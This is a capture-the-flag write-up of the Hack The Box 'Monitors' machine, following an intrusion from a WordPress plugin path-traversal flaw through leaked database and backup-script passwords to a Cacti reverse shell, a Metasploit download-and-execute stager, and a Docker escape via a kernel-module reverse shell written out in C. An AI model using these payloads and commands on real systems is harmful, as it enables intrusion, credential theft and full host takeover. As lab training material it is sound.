Welcome to the Monitors writeup from HTB
I hope you enjoy reading it. Any feedback will be appreciated! @x4v1l0k


Monitors

tags: HTB Hard Linux
Platform: Hackthebox
Difficult: Hard
S.O.: Linux

Enumeration

Nmap

To get started, we run a quick open ports scan.

$ sudo nmap -sS -p- -n -T5 -oN AllPorts.txt 10.10.10.238
[sudo] password for kali:         
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-24 13:43 EDT
Nmap scan report for 10.10.10.238
Host is up (0.048s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 55.04 seconds

Now that we know the open ports, let's scan them in depth.

$ sudo nmap -sC -sV -n -T5 -oN PortsDepth.txt -p22,80 10.10.10.238
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-24 13:45 EDT
Nmap scan report for 10.10.10.238
Host is up (0.047s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 ba:cc:cd:81:fc:91:55:f3:f6:a9:1f:4e:e8:be:e5:2e (RSA)
|   256 69:43:37:6a:18:09:f5:e7:7a:67:b8:18:11:ea:d7:65 (ECDSA)
|_  256 5d:5e:3f:67:ef:7d:76:23:15:11:4b:53:f8:41:3a:94 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Site doesn´t have a title (text/html; charset=iso-8859-1).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.47 seconds

When we access the web of port 80 we see that we have restricted access. In order to access, he tells us to contact admin@monitors.htb. If we add monitors.htb we can access the website with the url http://monitors.htb/.

Sorry, direct IP access is not allowed.

If you are having issues accessing the site then contact the website administrator: admin@monitors.htb

WPScan

$ wpscan --url http://monitors.htb/ -e ap,u,cb
[i] Plugin(s) Identified:

[+] wp-with-spritz
 | Location: http://monitors.htb/wp-content/plugins/wp-with-spritz/
 | Latest Version: 1.0 (up to date)
 | Last Updated: 2015-08-20T20:15:00.000Z
 |
 | Found By: Urls In Homepage (Passive Detection)
 |
 | Version: 4.2.4 (80% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://monitors.htb/wp-content/plugins/wp-with-spritz/readme.txt

Looking for vulnerabilities for the plugin version we can find an LFI / RFI in this link.

Exploitation

Using this URL http://monitors.htb/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../../..//etc/passwd we can get the /etc/passwd content.

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
marcus:x:1000:1000:Marcus Haynes:/home/marcus:/bin/bash
Debian-snmp:x:112:115::/var/lib/snmp:/bin/false
mysql:x:109:114:MySQL Server,,,:/nonexistent:/bin/false

Taking advantage of the LFI vulnerability we can read the wordpress wp-config.php file in search of the MySQL credentials.

view-source:http://monitors.htb/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=../../../wp-config.php
[...]
/** MySQL database username */
define( 'DB_USER', 'wpadmin' );

/** MySQL database password */
define( 'DB_PASSWORD', 'BestAdministrator@2020!' );

Looking inside http://monitors.htb/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../../..//etc/apache2/sites-enabled/000-default.conf we can find another domain name cacti-admin.monitors.htb.

# Default virtual host settings
# Add monitors.htb.conf
# Add cacti-admin.monitors.htb.conf

Inside this domain we find a login form. We can login using admin:BestAdministrator@2020! credentials.

Now, we can use this exploit to get shell. We put a terminal to listen and execute the exploit.

$ python3 exploit.py -t http://cacti-admin.monitors.htb -u admin -p 'BestAdministrator@2020!' --lhost 10.10.14.29 --lport 8787
[+] Connecting to the server...
[+] Retrieving CSRF token...
[+] Got CSRF token: sid:ac3fbf8f5163e68c4ded3c22646f2ca5a6c3961b,1627157074
[+] Trying to log in...
[+] Successfully logged in!

[+] SQL Injection:
"name","hex"
"",""
"admin","$2y$10$TycpbAes3hYvzsbRxUEbc.dTqT0MdgVipJNBYu8b7rUlmB8zn8JwK"
"guest","43e9a4ab75570f5b"

[+] Check your nc listener!
$ nc -lnvp 8787
listening on [any] 8787 ...
connect to [10.10.14.29] from (UNKNOWN) [10.10.10.238] 36118
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Post exploitation: www-data to marcus

Enumeration

Now, looking for the name of the subdomain cacti in the system we can find other credentials.

www-data@monitors:/$ find / -name "cacti*" 2>/dev/null
[...]
/etc/systemd/system/cacti-backup.service
[...]
www-data@monitors:/$ cat /etc/systemd/system/cacti-backup.service
[...]
ExecStart=/home/marcus/.backup/backup.sh
[...]
www-data@monitors:/home/marcus/.backup$ cat /home/marcus/.backup/backup.sh
#!/bin/bash

backup_name="cacti_backup"
config_pass="VerticalEdge2020"

zip /tmp/${backup_name}.zip /usr/share/cacti/cacti/*
sshpass -p "${config_pass}" scp /tmp/${backup_name} 192.168.1.14:/opt/backup_collection/${backup_name}.zip
rm /tmp/${backup_name}.zip

And now we only need to do su marcus using the password VerticalEdge2020 and read the user flag.

www-data@monitors:/home/marcus/.backup$ su marcus
Password: 
marcus@monitors:~/.backup$ id
uid=1000(marcus) gid=1000(marcus) groups=1000(marcus)
marcus@monitors:~/.backup$ cd 
marcus@monitors:~$ cat user.txt
CENSORED_FLAG
marcus@monitors:~$

Post exploitation: marcus to root

Enumeration

Looking at the output of the netstat command we can see that there is a port 8443 listening locally.

marcus@monitors:~$ netstat -putona
[...]
tcp        0      0 127.0.0.1:8443          0.0.0.0:*               LISTEN      -                    off (0.00/0/0)
[...]

We are going to redirect the port traffic to our machine doing Port Fordwarding via SSH.

$ ssh -L localhost:8443:localhost:8443 marcus@monitors.htb

Accessing port 8443 with HTTPS a Tomcat error appears with its version. Googling the version of Tomcat 9.0.31 we can find this vulnerability.

msf6 > use exploit/linux/http/apache_ofbiz_deserialization
msf6 exploit(linux/http/apache_ofbiz_deserialiation) > set rhosts 127.0.0.1
msf6 exploit(linux/http/apache_ofbiz_deserialiation) > set payload linux/x86/shell/reverse_tcp
msf6 exploit(linux/http/apache_ofbiz_deserialiation) > set lhost 10.10.14.29
msf6 exploit(linux/http/apache_ofbiz_deserialiation) > set lport 8888
msf6 exploit(linux/http/apache_ofbiz_deserialiation) > set forceexploit true
msf6 exploit(linux/http/apache_ofbiz_deserialiation) > show options

Module options (exploit/linux/http/apache_ofbiz_deserialiation):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     127.0.0.1        yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      8443             yes       The target port (TCP)
   SSL        true             no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       Base path
   URIPATH                     no        The URI to use for this exploit (default is random)
   VHOST                       no        HTTP server virtual host

Payload options (linux/x86/shell/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.10.14.29      yes       The listen address (an interface may be specified)
   LPORT  8888             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   1   Linux Dropper

msf6 exploit(linux/http/apache_ofbiz_deserialiation) > run

[*] Started reverse TCP handler on 10.10.14.29:8888 
[*] Executing automatic check (disable AutoCheck to override)
[!] The target is not exploitable. Target cannot deserialize arbitrary data. ForceExploit is enabled, proceeding with exploitation.
[*] Executing Linux Dropper for linux/x86/shell/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/re6R4gMz4969w
[*] Local IP: http://23.6.17.150:8080/re6R4gMz4969w
[+] Successfully executed command: sh -c curl${IFS}-so${IFS}/tmp/RXsgDGlc${IFS}http://10.10.14.29:8080/re6R4gMz4969w;chmod${IFS}+x${IFS}/tmp/RXsgDGlc;/tmp/RXsgDGlc;rm${IFS}-f${IFS}/tmp/RXsgDGlc
[*] Client 10.10.10.238 (curl/7.64.0) requested /re6R4gMz4969w
[*] Sending payload to 10.10.10.238 (curl/7.64.0)
[*] Command Stager progress - 103.95% done (158/152 bytes)
[*] Sending stage (36 bytes) to 10.10.10.238
[*] Command shell session 1 opened (10.10.14.29:8888 -> 10.10.10.238:41252) at 2021-07-25 18:54:45 +0200
[*] Server stopped.

id
uid=0(root) gid=0(root) groups=0(root)

And we are root but, we are inside a docker container.
If we list the capabilities with cpash --print we can see that cap_sys_module is available.

Searching the internet we can find this POC with which to escape the container and be root.

reverse-shell.c

#include <linux/kmod.h>
#include <linux/module.h>
MODULE_LICENSE("GPL");
MODULE_AUTHOR("AttackDefense");
MODULE_DESCRIPTION("LKM reverse shell module");
MODULE_VERSION("1.0");

char* argv[] = {"/bin/bash","-c","bash -i >& /dev/tcp/10.10.14.29/8787 0>&1", NULL};
static char* envp[] = {"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin", NULL };

// call_usermodehelper function is used to create user mode processes from kernel space
static int __init reverse_shell_init(void) {
    return call_usermodehelper(argv[0], argv, envp, UMH_WAIT_EXEC);
}

static void __exit reverse_shell_exit(void) {
    printk(KERN_INFO "Exiting\n");
}

module_init(reverse_shell_init);
module_exit(reverse_shell_exit);

Makefile

obj-m +=reverse-shell.o

all:
    make -C /lib/modules/4.15.0-142-generic/build M=$(PWD) modules

clean:
    make -C /lib/modules/4.15.0-142-generic/build M=$(PWD) clean
root@fb6c348eae64:/# make
make -C /lib/modules/4.15.0-142-generic/build M=/ modules
make[1]: Entering directory '/usr/src/linux-headers-4.15.0-142-generic'
  CC [M]  //reverse-shell.o
  Building modules, stage 2.
  MODPOST 1 modules
  CC      /reverse-shell.mod.o
  LD [M]  /reverse-shell.ko
make[1]: Leaving directory '/usr/src/linux-headers-4.15.0-142-generic'

We put the terminal to listen and execute.

root@fb6c348eae64:/# insmod reverse-shell.ko

And now, we are root and we can read his flag!.

$ nc -lnvp 8787
listening on [any] 8787 ...
connect to [10.10.14.29] from (UNKNOWN) [10.10.10.238] 49874
bash: cannot set terminal process group (-1): Inappropriate ioctl for device
bash: no job control in this shell
root@monitors:/# id
id
uid=0(root) gid=0(root) groups=0(root)
root@monitors:/# cat /root/root.txt
cat /root/root.txt
CENSORED_FLAG